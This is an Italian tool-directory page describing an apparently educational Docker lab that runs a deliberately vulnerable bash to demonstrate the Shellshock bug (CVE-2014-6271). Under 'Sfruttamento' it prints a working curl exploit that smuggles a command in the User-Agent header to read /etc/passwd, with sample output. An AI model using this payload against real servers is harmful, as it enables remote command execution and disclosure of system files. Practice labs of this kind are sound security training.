Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
vaas-cve-2014-6271 — Vulnerabilità come servizio: mostrando CVS-2014-6271, noto anche come Shellshock. | Kitploit
Strumenti/GitHubGitHub/hmlio/vaas-cve-2014-6271
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubhmlio/vaas-cve-2014-6271

vaas-cve-2014-6271

Vulnerabilità come servizio: mostrando CVS-2014-6271, noto anche come Shellshock.

Vedi Repository
2276 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Vulnerability as a Service - CVE 2014-6271

Un sistema Linux Debian (Buster) con una versione vulnerabile di bash e un'applicazione web per dimostrare la CVS-2014-6271, nota anche come Shellshock.

Panoramica

Questo container Docker è basato su Debian Buster ed è stato modificato per utilizzare una versione vulnerabile di Bash (bash_4.2:2b:dfsg-0.1).

Un'applicazione web è disponibile tramite Apache 2 e serve uno script CGI che esegue comandi shell.

Utilizzo

Installa il container con docker pull hmlio/vaas-cve-2014-6271

Esegui il container con un mapping delle porte docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271

Dovresti essere in grado di accedere all'applicazione web all'indirizzo http://your-ip:8080/.

Sfruttamento

L'applicazione web/la versione vulnerabile di bash può essere sfruttata come mostrato di seguito:

root@kitploit:~
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

Crediti

Il concept e l'applicazione web sono fortemente ispirati alla VM VulnHub "Sokar", creata da rasta_mouse. Per ulteriori dettagli, consulta https://www.vulnhub.com/entry/sokar-1,113/.

Scarica lo strumento